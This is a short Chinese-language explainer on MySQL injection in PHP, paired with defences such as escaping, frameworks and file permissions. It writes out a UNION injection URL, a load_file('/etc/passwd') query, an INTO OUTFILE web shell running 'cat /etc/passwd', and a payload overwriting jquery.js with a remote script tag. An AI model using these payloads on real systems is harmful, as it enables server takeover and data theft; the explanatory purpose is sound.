mysql注入最典型的的场景莫过于不对参数进行过滤,比如典型的语句,选择一个用户信息显示php代码:
$sql = "select * from user where id={$_GET['id']}";
用户只需要在浏览器地址栏中网址后面的比如:id=23修改一下:
http://xxx.com/xxx?id=23 union all select * from user;
这就能筛选出所有用户了。
避免这类事情出现的方法自然是使用参数过滤,用数据库驱动接口中的mysql_real_escape_string可以解决这个问题。当然最稳妥的还是使用框架来写代码,框架已经对mysql注入进行了比较好的防范。但是,使用框架后一定要切记尽量不要评价sql语句,只要拼接,就要考虑注入问题。
这里要提出的是,mysql还有一个功能,它能加载文件显示,比如:
select load_file('/etc/passwd');
避免这个问题的方法自然是进行参数过滤。
它还能写入文件,比如:
select '<?php system(\'cat /etc/passwd\'); ?>' into outfile '/data/web/www/command.php';
这样,用户就可以从网址输入command.php访问页面,从而达到查看linux系统中用户信息的目的。当然,利用这个方式还可以给网站各个js注入代码。
避免这个问题产生的方法除了参数过滤以外,还可以让mysql运行在mysql用户下,网站文件则用apache用户或www用户等,并且不要简单的把所有文件权限设置为777。
windows用户就比较惨了,如果原生方法写代码,又不对参数进行过滤,那么往网站js中注入代码就是很简单的事情,比如:
select '<script src=\'http://xxxx.xxx.com/xxx.js\'>' into outfile 'D:\\web\\www\\htdocs\\js\\jquery.js';
这个语句将给jquery.js注入危险的js代码。当然还可以写一个php文件,然后执行它,这个文件则是想做什么都可以了,反正php文件是可以操作服务器文件的。